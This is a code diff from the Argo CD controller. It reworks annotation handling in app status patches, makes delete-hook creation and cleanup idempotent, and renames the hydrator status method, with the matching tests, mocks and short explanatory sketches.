func (ctrl *ApplicationController) persistAppStatus(orig *appv1.Application, newStatus *appv1.ApplicationStatus) (patchDuration time.Duration) {
logCtx := log.WithFields(applog.GetAppLogFields(orig))
if orig.Status.Sync.Status != newStatus.Sync.Status {
message := fmt.Sprintf("Updated sync status: %s -> %s", orig.Status.Sync.Status, newStatus.Sync.Status)
@@ -2176,6 +2167,13 @@ func (ctrl *ApplicationController) persistAppStatus(orig *appv1.Application, new
// make sure the last transition time is the same and populated if the health is the same
newStatus.Health.LastTransitionTime = orig.Status.Health.LastTransitionTime
}
var newAnnotations map[string]string
if orig.GetAnnotations() != nil {
newAnnotations = make(map[string]string)
maps.Copy(newAnnotations, orig.GetAnnotations())
delete(newAnnotations, appv1.AnnotationKeyRefresh)
delete(newAnnotations, appv1.AnnotationKeyHydrate)
}
patch, modified, err := createMergePatch(
&appv1.Application{ObjectMeta: metav1.ObjectMeta{Annotations: orig.GetAnnotations()}, Status: orig.Status},
&appv1.Application{ObjectMeta: metav1.ObjectMeta{Annotations: newAnnotations}, Status: *newStatus})
@@ -2763,7 +2761,7 @@ func (ctrl *ApplicationController) applyImpersonationConfig(config *rest.Config,
if !impersonationEnabled {
return nil
}
user, err := settings_util.DeriveServiceAccountToImpersonate(proj, app, destCluster)
user, err := deriveServiceAccountToImpersonate(proj, app, destCluster)
if err != nil {
return fmt.Errorf("error deriving service account to impersonate: %w", err)
}
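The `persistAppStatus` change above folds annotation handling into the status patch: the original annotations are copied, the refresh and hydrate keys are dropped, and a nil map stays nil so apps without annotations produce no annotation diff. A minimal sketch of that copy-and-consume step (annotation key constants are illustrative stand-ins):

```go
package main

import (
	"fmt"
	"maps"
)

const (
	annotationKeyRefresh = "argocd.argoproj.io/refresh"
	annotationKeyHydrate = "argocd.argoproj.io/hydrate"
)

// consumeRefreshAnnotations copies the original annotations and drops the
// refresh and hydrate keys, so persisting status also "consumes" a requested
// refresh. A nil input stays nil: no annotation patch for unannotated apps.
func consumeRefreshAnnotations(orig map[string]string) map[string]string {
	if orig == nil {
		return nil
	}
	out := make(map[string]string)
	maps.Copy(out, orig)
	delete(out, annotationKeyRefresh)
	delete(out, annotationKeyHydrate)
	return out
}

func main() {
	in := map[string]string{
		annotationKeyRefresh: "normal",
		annotationKeyHydrate: "normal",
		"team":               "platform",
	}
	fmt.Println(consumeRefreshAnnotations(in)) // map[team:platform]
	fmt.Println(consumeRefreshAnnotations(nil) == nil) // true
}
```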

View File

@@ -5,7 +5,6 @@ import (
"encoding/json"
"errors"
"fmt"
"maps"
"strconv"
"testing"
"time"
@@ -664,7 +663,8 @@ func TestAutoSync(t *testing.T) {
func TestAutoSyncEnabledSetToTrue(t *testing.T) {
app := newFakeApp()
app.Spec.SyncPolicy.Automated = &v1alpha1.SyncPolicyAutomated{Enabled: new(true)}
enable := true
app.Spec.SyncPolicy.Automated = &v1alpha1.SyncPolicyAutomated{Enabled: &enable}
ctrl := newFakeController(t.Context(), &fakeData{apps: []runtime.Object{app}}, nil)
syncStatus := v1alpha1.SyncStatus{
Status: v1alpha1.SyncStatusCodeOutOfSync,
@@ -790,7 +790,8 @@ func TestSkipAutoSync(t *testing.T) {
// Verify we skip when auto-sync is disabled
t.Run("AutoSyncEnableFieldIsSetFalse", func(t *testing.T) {
app := newFakeApp()
app.Spec.SyncPolicy.Automated = &v1alpha1.SyncPolicyAutomated{Enabled: new(false)}
enable := false
app.Spec.SyncPolicy.Automated = &v1alpha1.SyncPolicyAutomated{Enabled: &enable}
ctrl := newFakeController(t.Context(), &fakeData{apps: []runtime.Object{app}}, nil)
syncStatus := v1alpha1.SyncStatus{
Status: v1alpha1.SyncStatusCodeOutOfSync,
@@ -3605,82 +3606,3 @@ func TestSelfHealRemainingBackoff(t *testing.T) {
})
}
}
func TestPersistAppStatus_AnnotationManagement(t *testing.T) {
t.Run("persistReconciliationStatus deletes only refresh annotation", func(t *testing.T) {
app := newFakeApp()
app.Annotations = map[string]string{
v1alpha1.AnnotationKeyRefresh: string(v1alpha1.RefreshTypeNormal),
v1alpha1.AnnotationKeyHydrate: string(v1alpha1.HydrateTypeNormal),
"other-annotation": "other-value",
}
app.Status.Sync.Status = v1alpha1.SyncStatusCodeSynced
app.Status.Health.Status = health.HealthStatusHealthy
ctrl := newFakeController(t.Context(), &fakeData{apps: []runtime.Object{app}}, nil)
origApp := app.DeepCopy()
newStatus := app.Status.DeepCopy()
ctrl.persistReconciliationStatus(origApp, newStatus)
// Verify the patch was created correctly
patchedApp, err := ctrl.applicationClientset.ArgoprojV1alpha1().Applications(app.Namespace).Get(context.Background(), app.Name, metav1.GetOptions{})
require.NoError(t, err)
// Refresh annotation should be deleted
_, hasRefresh := patchedApp.Annotations[v1alpha1.AnnotationKeyRefresh]
assert.False(t, hasRefresh, "refresh annotation should be deleted")
// Hydrate annotation should still exist
hydrateValue, hasHydrate := patchedApp.Annotations[v1alpha1.AnnotationKeyHydrate]
assert.True(t, hasHydrate, "hydrate annotation should still exist")
assert.Equal(t, string(v1alpha1.HydrateTypeNormal), hydrateValue)
// Other annotations should be preserved
otherValue, hasOther := patchedApp.Annotations["other-annotation"]
assert.True(t, hasOther, "other annotations should be preserved")
assert.Equal(t, "other-value", otherValue)
})
t.Run("persistAppStatus with explicit annotations", func(t *testing.T) {
app := newFakeApp()
app.Annotations = map[string]string{
v1alpha1.AnnotationKeyRefresh: string(v1alpha1.RefreshTypeNormal),
v1alpha1.AnnotationKeyHydrate: string(v1alpha1.HydrateTypeNormal),
"other-annotation": "other-value",
}
app.Status.Sync.Status = v1alpha1.SyncStatusCodeSynced
app.Status.Health.Status = health.HealthStatusHealthy
ctrl := newFakeController(t.Context(), &fakeData{apps: []runtime.Object{app}}, nil)
origApp := app.DeepCopy()
newStatus := app.Status.DeepCopy()
// Create annotations that delete hydrate but keep refresh
newAnnotations := make(map[string]string)
maps.Copy(newAnnotations, origApp.Annotations)
delete(newAnnotations, v1alpha1.AnnotationKeyHydrate)
ctrl.persistAppStatus(origApp, newStatus, newAnnotations)
// Verify the patch was created correctly
patchedApp, err := ctrl.applicationClientset.ArgoprojV1alpha1().Applications(app.Namespace).Get(context.Background(), app.Name, metav1.GetOptions{})
require.NoError(t, err)
// Hydrate annotation should be deleted
_, hasHydrate := patchedApp.Annotations[v1alpha1.AnnotationKeyHydrate]
assert.False(t, hasHydrate, "hydrate annotation should be deleted")
// Refresh annotation should still exist
refreshValue, hasRefresh := patchedApp.Annotations[v1alpha1.AnnotationKeyRefresh]
assert.True(t, hasRefresh, "refresh annotation should still exist")
assert.Equal(t, string(v1alpha1.RefreshTypeNormal), refreshValue)
// Other annotations should be preserved
otherValue, hasOther := patchedApp.Annotations["other-annotation"]
assert.True(t, hasOther, "other annotations should be preserved")
assert.Equal(t, "other-value", otherValue)
})
}

View File

@@ -11,6 +11,7 @@ import (
"github.com/argoproj/argo-cd/gitops-engine/pkg/sync/hook"
"github.com/argoproj/argo-cd/gitops-engine/pkg/utils/kube"
log "github.com/sirupsen/logrus"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/client-go/rest"
@@ -103,6 +104,7 @@ func (ctrl *ApplicationController) executeHooks(hookType HookType, app *appv1.Ap
revisions = append(revisions, src.TargetRevision)
}
// Fetch target objects from Git to know which hooks should exist
targets, _, _, err := ctrl.appStateManager.GetRepoObjs(context.Background(), app, app.Spec.GetSources(), appLabelKey, revisions, false, false, false, proj, true)
if err != nil {
return false, err
@@ -125,14 +127,14 @@ func (ctrl *ApplicationController) executeHooks(hookType HookType, app *appv1.Ap
if !isHookOfType(obj, hookType) {
continue
}
if runningHook := runningHooks[kube.GetResourceKey(obj)]; runningHook == nil {
if _, alreadyExists := runningHooks[kube.GetResourceKey(obj)]; !alreadyExists {
expectedHook[kube.GetResourceKey(obj)] = obj
}
}
// Create hooks that don't exist yet
createdCnt := 0
for _, obj := range expectedHook {
for key, obj := range expectedHook {
// Add app instance label so the hook can be tracked and cleaned up
labels := obj.GetLabels()
if labels == nil {
@@ -141,8 +143,13 @@ func (ctrl *ApplicationController) executeHooks(hookType HookType, app *appv1.Ap
labels[appLabelKey] = app.InstanceName(ctrl.namespace)
obj.SetLabels(labels)
logCtx.Infof("Creating %s hook resource: %s", hookType, key)
_, err = ctrl.kubectl.CreateResource(context.Background(), config, obj.GroupVersionKind(), obj.GetName(), obj.GetNamespace(), obj, metav1.CreateOptions{})
if err != nil {
if apierrors.IsAlreadyExists(err) {
logCtx.Warnf("Hook resource %s already exists, skipping", key)
continue
}
return false, err
}
createdCnt++
@@ -163,7 +170,8 @@ func (ctrl *ApplicationController) executeHooks(hookType HookType, app *appv1.Ap
progressingHooksCount := 0
var failedHooks []string
var failedHookObjects []*unstructured.Unstructured
for _, obj := range runningHooks {
for key, obj := range runningHooks {
hookHealth, err := health.GetResourceHealth(obj, healthOverrides)
if err != nil {
return false, err
@@ -180,12 +188,17 @@ func (ctrl *ApplicationController) executeHooks(hookType HookType, app *appv1.Ap
Status: health.HealthStatusHealthy,
}
}
switch hookHealth.Status {
case health.HealthStatusProgressing:
logCtx.Debugf("Hook %s is progressing", key)
progressingHooksCount++
case health.HealthStatusDegraded:
logCtx.Warnf("Hook %s is degraded: %s", key, hookHealth.Message)
failedHooks = append(failedHooks, fmt.Sprintf("%s/%s", obj.GetNamespace(), obj.GetName()))
failedHookObjects = append(failedHookObjects, obj)
case health.HealthStatusHealthy:
logCtx.Debugf("Hook %s is healthy", key)
}
}
@@ -194,7 +207,7 @@ func (ctrl *ApplicationController) executeHooks(hookType HookType, app *appv1.Ap
logCtx.Infof("Deleting %d failed %s hook(s) to allow retry", len(failedHookObjects), hookType)
for _, obj := range failedHookObjects {
err = ctrl.kubectl.DeleteResource(context.Background(), config, obj.GroupVersionKind(), obj.GetName(), obj.GetNamespace(), metav1.DeleteOptions{})
if err != nil {
if err != nil && !apierrors.IsNotFound(err) {
logCtx.WithError(err).Warnf("Failed to delete failed hook %s/%s", obj.GetNamespace(), obj.GetName())
}
}
@@ -241,6 +254,10 @@ func (ctrl *ApplicationController) cleanupHooks(hookType HookType, liveObjs map[
hooks = append(hooks, obj)
}
if len(hooks) == 0 {
return true, nil
}
// Process hooks for deletion
for _, obj := range hooks {
deletePolicies := hook.DeletePolicies(obj)
@@ -267,7 +284,7 @@ func (ctrl *ApplicationController) cleanupHooks(hookType HookType, liveObjs map[
}
logCtx.Infof("Deleting %s hook %s/%s", hookType, obj.GetNamespace(), obj.GetName())
err = ctrl.kubectl.DeleteResource(context.Background(), config, obj.GroupVersionKind(), obj.GetName(), obj.GetNamespace(), metav1.DeleteOptions{})
if err != nil {
if err != nil && !apierrors.IsNotFound(err) {
return false, err
}
}
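The hook fix above makes creation and deletion idempotent: `apierrors.IsAlreadyExists` on create and `apierrors.IsNotFound` on delete are tolerated, so a retried reconcile does not fail on work a previous attempt already did. The same pattern, sketched without Kubernetes dependencies using sentinel errors and a map-backed stand-in for the cluster:

```go
package main

import (
	"errors"
	"fmt"
)

var (
	errAlreadyExists = errors.New("already exists")
	errNotFound      = errors.New("not found")
)

// store stands in for the cluster.
type store map[string]bool

func (s store) create(name string) error {
	if s[name] {
		return fmt.Errorf("hook %s: %w", name, errAlreadyExists)
	}
	s[name] = true
	return nil
}

func (s store) remove(name string) error {
	if !s[name] {
		return fmt.Errorf("hook %s: %w", name, errNotFound)
	}
	delete(s, name)
	return nil
}

// ensureHook treats "already exists" as success, mirroring apierrors.IsAlreadyExists.
func ensureHook(s store, name string) error {
	if err := s.create(name); err != nil && !errors.Is(err, errAlreadyExists) {
		return err
	}
	return nil
}

// removeHook treats "not found" as success, mirroring apierrors.IsNotFound.
func removeHook(s store, name string) error {
	if err := s.remove(name); err != nil && !errors.Is(err, errNotFound) {
		return err
	}
	return nil
}

func main() {
	s := store{}
	fmt.Println(ensureHook(s, "pre-delete"), ensureHook(s, "pre-delete")) // <nil> <nil>
	fmt.Println(removeHook(s, "pre-delete"), removeHook(s, "pre-delete")) // <nil> <nil>
}
```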

View File

@@ -3,8 +3,10 @@ package controller
import (
"testing"
"github.com/argoproj/argo-cd/gitops-engine/pkg/utils/kube"
"github.com/stretchr/testify/assert"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/apimachinery/pkg/runtime/schema"
)
func TestIsHookOfType(t *testing.T) {
@@ -312,3 +314,174 @@ func TestMultiHookOfType(t *testing.T) {
})
}
}
func TestExecuteHooksAlreadyExistsLogic(t *testing.T) {
newObj := func(name string, annot map[string]string) *unstructured.Unstructured {
obj := &unstructured.Unstructured{}
obj.SetGroupVersionKind(schema.GroupVersionKind{Group: "batch", Version: "v1", Kind: "Job"})
obj.SetName(name)
obj.SetNamespace("default")
obj.SetAnnotations(annot)
return obj
}
tests := []struct {
name string
hookType []HookType
targetAnnot map[string]string
liveAnnot map[string]string // nil -> object doesn't exist in cluster
expectCreated bool
}{
// PRE DELETE TESTS
{
name: "PreDelete (argocd): Not in cluster - should be created",
hookType: []HookType{PreDeleteHookType},
targetAnnot: map[string]string{"argocd.argoproj.io/hook": "PreDelete"},
liveAnnot: nil,
expectCreated: true,
},
{
name: "PreDelete (helm): Not in cluster - should be created",
hookType: []HookType{PreDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "pre-delete"},
liveAnnot: nil,
expectCreated: true,
},
{
name: "PreDelete (argocd): Already exists - should be skipped",
hookType: []HookType{PreDeleteHookType},
targetAnnot: map[string]string{"argocd.argoproj.io/hook": "PreDelete"},
liveAnnot: map[string]string{"argocd.argoproj.io/hook": "PreDelete"},
expectCreated: false,
},
{
name: "PreDelete (helm): Already exists - should be skipped",
hookType: []HookType{PreDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "pre-delete"},
liveAnnot: map[string]string{"helm.sh/hook": "pre-delete"},
expectCreated: false,
},
{
name: "PreDelete (helm+argocd): One of two already exists - should be skipped",
hookType: []HookType{PreDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "pre-delete", "argocd.argoproj.io/hook": "PreDelete"},
liveAnnot: map[string]string{"helm.sh/hook": "pre-delete"},
expectCreated: false,
},
{
name: "PreDelete (helm+argocd): One of two already exists - should be skipped",
hookType: []HookType{PreDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "pre-delete", "argocd.argoproj.io/hook": "PreDelete"},
liveAnnot: map[string]string{"argocd.argoproj.io/hook": "PreDelete"},
expectCreated: false,
},
// POST DELETE TESTS
{
name: "PostDelete (argocd): Not in cluster - should be created",
hookType: []HookType{PostDeleteHookType},
targetAnnot: map[string]string{"argocd.argoproj.io/hook": "PostDelete"},
liveAnnot: nil,
expectCreated: true,
},
{
name: "PostDelete (helm): Not in cluster - should be created",
hookType: []HookType{PostDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "post-delete"},
liveAnnot: nil,
expectCreated: true,
},
{
name: "PostDelete (argocd): Already exists - should be skipped",
hookType: []HookType{PostDeleteHookType},
targetAnnot: map[string]string{"argocd.argoproj.io/hook": "PostDelete"},
liveAnnot: map[string]string{"argocd.argoproj.io/hook": "PostDelete"},
expectCreated: false,
},
{
name: "PostDelete (helm): Already exists - should be skipped",
hookType: []HookType{PostDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "post-delete"},
liveAnnot: map[string]string{"helm.sh/hook": "post-delete"},
expectCreated: false,
},
{
name: "PostDelete (helm+argocd): Already exists - should be skipped",
hookType: []HookType{PostDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "post-delete", "argocd.argoproj.io/hook": "PostDelete"},
liveAnnot: map[string]string{"helm.sh/hook": "post-delete", "argocd.argoproj.io/hook": "PostDelete"},
expectCreated: false,
},
{
name: "PostDelete (helm+argocd): One of two already exists - should be skipped",
hookType: []HookType{PostDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "post-delete", "argocd.argoproj.io/hook": "PostDelete"},
liveAnnot: map[string]string{"helm.sh/hook": "post-delete"},
expectCreated: false,
},
{
name: "PostDelete (helm+argocd): One of two already exists - should be skipped",
hookType: []HookType{PostDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "post-delete", "argocd.argoproj.io/hook": "PostDelete"},
liveAnnot: map[string]string{"argocd.argoproj.io/hook": "PostDelete"},
expectCreated: false,
},
// MULTI HOOK TESTS - SKIP LOGIC
{
name: "Multi-hook (argocd): Target is (Pre,Post), Cluster has (Pre,Post) - should be skipped",
hookType: []HookType{PreDeleteHookType, PostDeleteHookType},
targetAnnot: map[string]string{"argocd.argoproj.io/hook": "PreDelete,PostDelete"},
liveAnnot: map[string]string{"argocd.argoproj.io/hook": "PreDelete,PostDelete"},
expectCreated: false,
},
{
name: "Multi-hook (helm): Target is (Pre,Post), Cluster has (Pre,Post) - should be skipped",
hookType: []HookType{PreDeleteHookType, PostDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "post-delete,pre-delete"},
liveAnnot: map[string]string{"helm.sh/hook": "post-delete,pre-delete"},
expectCreated: false,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
targetObj := newObj("my-hook", tt.targetAnnot)
targetKey := kube.GetResourceKey(targetObj)
liveObjs := make(map[kube.ResourceKey]*unstructured.Unstructured)
if tt.liveAnnot != nil {
liveObjs[targetKey] = newObj("my-hook", tt.liveAnnot)
}
runningHooks := map[kube.ResourceKey]*unstructured.Unstructured{}
for key, obj := range liveObjs {
for _, hookType := range tt.hookType {
if isHookOfType(obj, hookType) {
runningHooks[key] = obj
}
}
}
expectedHooksToCreate := map[kube.ResourceKey]*unstructured.Unstructured{}
targets := []*unstructured.Unstructured{targetObj}
for _, obj := range targets {
isHook := false
for _, hookType := range tt.hookType {
if isHookOfType(obj, hookType) {
isHook = true
break
}
}
if !isHook {
continue
}
objKey := kube.GetResourceKey(obj)
if _, alreadyExists := runningHooks[objKey]; !alreadyExists {
expectedHooksToCreate[objKey] = obj
}
}
if tt.expectCreated {
assert.NotEmpty(t, expectedHooksToCreate, "Expected hook to be marked for creation")
} else {
assert.Empty(t, expectedHooksToCreate, "Expected hook to be skipped (already exists)")
}
})
}
}
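The skip logic exercised above turns on whether the live object carries the relevant hook annotation. A minimal standalone sketch of that annotation check, assuming the `argocd.argoproj.io/hook` and `helm.sh/hook` keys with comma-separated values as in the cases above (`hasHookType` is a hypothetical helper, not the repo's actual `isHookOfType`):

```go
package main

import (
	"fmt"
	"strings"
)

// hasHookType reports whether the annotations declare the given hook type
// under either the Argo CD or the Helm annotation key. Both keys accept a
// comma-separated list of hook types.
func hasHookType(annotations map[string]string, argoType, helmType string) bool {
	for key, want := range map[string]string{
		"argocd.argoproj.io/hook": argoType, // e.g. "PostDelete"
		"helm.sh/hook":            helmType, // e.g. "post-delete"
	} {
		for _, v := range strings.Split(annotations[key], ",") {
			if strings.TrimSpace(v) == want {
				return true
			}
		}
	}
	return false
}

func main() {
	live := map[string]string{"helm.sh/hook": "post-delete,pre-delete"}
	fmt.Println(hasHookType(live, "PostDelete", "post-delete")) // true
	fmt.Println(hasHookType(live, "PreSync", "pre-sync"))       // false
}
```

If the live object matches any requested hook type, it is treated as an already-running hook and excluded from the set of hooks to create.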


@@ -60,8 +60,8 @@ type Dependencies interface {
// trigger a refresh after the application has been hydrated and a new commit has been pushed.
RequestAppRefresh(appName string, appNamespace string) error
// PersistHydrationStatus persists the application status for the source hydrator.
PersistHydrationStatus(orig *appv1.Application, newStatus *appv1.SourceHydratorStatus)
// PersistAppHydratorStatus persists the application status for the source hydrator.
PersistAppHydratorStatus(orig *appv1.Application, newStatus *appv1.SourceHydratorStatus)
// AddHydrationQueueItem adds a hydration queue item to the queue. This is used to trigger the hydration process for
// a group of applications which are hydrating to the same repo and target branch.
@@ -123,10 +123,9 @@ func (h *Hydrator) ProcessAppHydrateQueueItem(origApp *appv1.Application) {
Phase: appv1.HydrateOperationPhaseHydrating,
SourceHydrator: *app.Spec.SourceHydrator,
}
h.dependencies.PersistAppHydratorStatus(origApp, &app.Status.SourceHydrator)
}
h.dependencies.PersistHydrationStatus(origApp, &app.Status.SourceHydrator)
needsRefresh := app.Status.SourceHydrator.CurrentOperation.Phase == appv1.HydrateOperationPhaseHydrating && metav1.Now().Sub(app.Status.SourceHydrator.CurrentOperation.StartedAt.Time) > h.statusRefreshTimeout
if needsHydration || needsRefresh {
logCtx.WithField("reason", reason).Info("Hydrating app")
@@ -253,7 +252,7 @@ func (h *Hydrator) ProcessHydrationQueueItem(hydrationKey types.HydrationQueueKe
HydratedSHA: hydratedSHA,
SourceHydrator: app.Status.SourceHydrator.CurrentOperation.SourceHydrator,
}
h.dependencies.PersistHydrationStatus(origApp, &app.Status.SourceHydrator)
h.dependencies.PersistAppHydratorStatus(origApp, &app.Status.SourceHydrator)
// Request a refresh since we pushed a new commit.
err := h.dependencies.RequestAppRefresh(app.Name, app.Namespace)
@@ -275,7 +274,7 @@ func (h *Hydrator) setAppHydratorError(app *appv1.Application, err error) {
failedAt := metav1.Now()
app.Status.SourceHydrator.CurrentOperation.FinishedAt = &failedAt
app.Status.SourceHydrator.CurrentOperation.Message = fmt.Sprintf("Failed to hydrate: %v", err.Error())
h.dependencies.PersistHydrationStatus(origApp, &app.Status.SourceHydrator)
h.dependencies.PersistAppHydratorStatus(origApp, &app.Status.SourceHydrator)
}
// getAppsForHydrationKey returns the applications matching the hydration key.


@@ -394,7 +394,7 @@ func TestProcessAppHydrateQueueItem_HydrationNeeded(t *testing.T) {
app.Status.SourceHydrator.CurrentOperation = nil
var persistedStatus *v1alpha1.SourceHydratorStatus
d.EXPECT().PersistHydrationStatus(mock.Anything, mock.Anything).Run(func(_ *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
d.EXPECT().PersistAppHydratorStatus(mock.Anything, mock.Anything).Run(func(_ *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
persistedStatus = newStatus
}).Return().Once()
d.EXPECT().AddHydrationQueueItem(mock.Anything).Return().Once()
@@ -406,7 +406,7 @@ func TestProcessAppHydrateQueueItem_HydrationNeeded(t *testing.T) {
h.ProcessAppHydrateQueueItem(app)
d.AssertCalled(t, "PersistHydrationStatus", mock.Anything, mock.Anything)
d.AssertCalled(t, "PersistAppHydratorStatus", mock.Anything, mock.Anything)
d.AssertCalled(t, "AddHydrationQueueItem", mock.Anything)
require.NotNil(t, persistedStatus)
@@ -433,7 +433,6 @@ func TestProcessAppHydrateQueueItem_HydrationPassedTimeout(t *testing.T) {
},
}
d.EXPECT().AddHydrationQueueItem(mock.Anything).Return().Once()
d.EXPECT().PersistHydrationStatus(app, &app.Status.SourceHydrator).Return().Once()
h := &Hydrator{
dependencies: d,
@@ -443,7 +442,7 @@ func TestProcessAppHydrateQueueItem_HydrationPassedTimeout(t *testing.T) {
h.ProcessAppHydrateQueueItem(app)
d.AssertCalled(t, "AddHydrationQueueItem", mock.Anything)
d.AssertCalled(t, "PersistHydrationStatus", mock.Anything, mock.Anything)
d.AssertNotCalled(t, "PersistAppHydratorStatus", mock.Anything, mock.Anything)
}
func TestProcessAppHydrateQueueItem_NoSourceHydrator(t *testing.T) {
@@ -459,7 +458,7 @@ func TestProcessAppHydrateQueueItem_NoSourceHydrator(t *testing.T) {
h.ProcessAppHydrateQueueItem(app)
// Should not call anything
d.AssertNotCalled(t, "PersistHydrationStatus", mock.Anything, mock.Anything)
d.AssertNotCalled(t, "PersistAppHydratorStatus", mock.Anything, mock.Anything)
d.AssertNotCalled(t, "AddHydrationQueueItem", mock.Anything)
}
@@ -477,15 +476,14 @@ func TestProcessAppHydrateQueueItem_HydrationNotNeeded(t *testing.T) {
},
}
d.EXPECT().PersistHydrationStatus(app, &app.Status.SourceHydrator).Return().Once()
h := &Hydrator{
dependencies: d,
statusRefreshTimeout: time.Minute,
}
h.ProcessAppHydrateQueueItem(app)
d.AssertCalled(t, "PersistHydrationStatus", mock.Anything, mock.Anything)
// Should not call anything
d.AssertNotCalled(t, "PersistAppHydratorStatus", mock.Anything, mock.Anything)
d.AssertNotCalled(t, "AddHydrationQueueItem", mock.Anything)
}
@@ -506,7 +504,7 @@ func TestProcessHydrationQueueItem_ValidationFails(t *testing.T) {
// Expect setAppHydratorError to be called
var persistedStatus1 *v1alpha1.SourceHydratorStatus
var persistedStatus2 *v1alpha1.SourceHydratorStatus
d.EXPECT().PersistHydrationStatus(mock.Anything, mock.Anything).Run(func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
d.EXPECT().PersistAppHydratorStatus(mock.Anything, mock.Anything).Run(func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
switch orig.Name {
case app1.Name:
persistedStatus1 = newStatus
@@ -526,7 +524,7 @@ func TestProcessHydrationQueueItem_ValidationFails(t *testing.T) {
assert.Contains(t, persistedStatus2.CurrentOperation.Message, "cannot hydrate because application default/test-app has an error")
assert.Equal(t, v1alpha1.HydrateOperationPhaseFailed, persistedStatus1.CurrentOperation.Phase)
d.AssertNumberOfCalls(t, "PersistHydrationStatus", 2)
d.AssertNumberOfCalls(t, "PersistAppHydratorStatus", 2)
d.AssertNotCalled(t, "RequestAppRefresh", mock.Anything, mock.Anything)
}
@@ -550,7 +548,7 @@ func TestProcessHydrationQueueItem_HydrateFails_AppSpecificError(t *testing.T) {
// Expect setAppHydratorError to be called
var persistedStatus1 *v1alpha1.SourceHydratorStatus
var persistedStatus2 *v1alpha1.SourceHydratorStatus
d.EXPECT().PersistHydrationStatus(mock.Anything, mock.Anything).Run(func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
d.EXPECT().PersistAppHydratorStatus(mock.Anything, mock.Anything).Run(func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
switch orig.Name {
case app1.Name:
persistedStatus1 = newStatus
@@ -570,7 +568,7 @@ func TestProcessHydrationQueueItem_HydrateFails_AppSpecificError(t *testing.T) {
assert.Contains(t, persistedStatus2.CurrentOperation.Message, "cannot hydrate because application default/test-app has an error")
assert.Equal(t, v1alpha1.HydrateOperationPhaseFailed, persistedStatus1.CurrentOperation.Phase)
d.AssertNumberOfCalls(t, "PersistHydrationStatus", 2)
d.AssertNumberOfCalls(t, "PersistAppHydratorStatus", 2)
d.AssertNotCalled(t, "RequestAppRefresh", mock.Anything, mock.Anything)
}
@@ -595,7 +593,7 @@ func TestProcessHydrationQueueItem_HydrateFails_CommonError(t *testing.T) {
// Expect setAppHydratorError to be called
var persistedStatus1 *v1alpha1.SourceHydratorStatus
var persistedStatus2 *v1alpha1.SourceHydratorStatus
d.EXPECT().PersistHydrationStatus(mock.Anything, mock.Anything).Run(func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
d.EXPECT().PersistAppHydratorStatus(mock.Anything, mock.Anything).Run(func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
switch orig.Name {
case app1.Name:
persistedStatus1 = newStatus
@@ -617,7 +615,7 @@ func TestProcessHydrationQueueItem_HydrateFails_CommonError(t *testing.T) {
assert.Equal(t, v1alpha1.HydrateOperationPhaseFailed, persistedStatus1.CurrentOperation.Phase)
assert.Equal(t, "abc123", persistedStatus1.CurrentOperation.DrySHA)
d.AssertNumberOfCalls(t, "PersistHydrationStatus", 2)
d.AssertNumberOfCalls(t, "PersistAppHydratorStatus", 2)
d.AssertNotCalled(t, "RequestAppRefresh", mock.Anything, mock.Anything)
}
@@ -635,7 +633,7 @@ func TestProcessHydrationQueueItem_SuccessfulHydration(t *testing.T) {
// Expect setAppHydratorError to be called
var persistedStatus *v1alpha1.SourceHydratorStatus
d.EXPECT().PersistHydrationStatus(mock.Anything, mock.Anything).Run(func(_ *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
d.EXPECT().PersistAppHydratorStatus(mock.Anything, mock.Anything).Run(func(_ *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
persistedStatus = newStatus
}).Return().Once()
d.EXPECT().RequestAppRefresh(app.Name, app.Namespace).Return(nil).Once()
@@ -652,7 +650,7 @@ func TestProcessHydrationQueueItem_SuccessfulHydration(t *testing.T) {
h.ProcessHydrationQueueItem(hydrationKey)
d.AssertCalled(t, "PersistHydrationStatus", mock.Anything, mock.Anything)
d.AssertCalled(t, "PersistAppHydratorStatus", mock.Anything, mock.Anything)
d.AssertCalled(t, "RequestAppRefresh", app.Name, app.Namespace)
assert.NotNil(t, persistedStatus)
assert.Equal(t, app.Status.SourceHydrator.CurrentOperation.StartedAt, persistedStatus.CurrentOperation.StartedAt)


@@ -525,25 +525,25 @@ func (_c *Dependencies_GetWriteCredentials_Call) RunAndReturn(run func(ctx conte
return _c
}
// PersistHydrationStatus provides a mock function for the type Dependencies
func (_mock *Dependencies) PersistHydrationStatus(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
// PersistAppHydratorStatus provides a mock function for the type Dependencies
func (_mock *Dependencies) PersistAppHydratorStatus(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
_mock.Called(orig, newStatus)
return
}
// Dependencies_PersistHydrationStatus_Call is a *mock.Call that shadows Run/Return methods with type explicit version for method 'PersistHydrationStatus'
type Dependencies_PersistHydrationStatus_Call struct {
// Dependencies_PersistAppHydratorStatus_Call is a *mock.Call that shadows Run/Return methods with type explicit version for method 'PersistAppHydratorStatus'
type Dependencies_PersistAppHydratorStatus_Call struct {
*mock.Call
}
// PersistHydrationStatus is a helper method to define mock.On call
// PersistAppHydratorStatus is a helper method to define mock.On call
// - orig *v1alpha1.Application
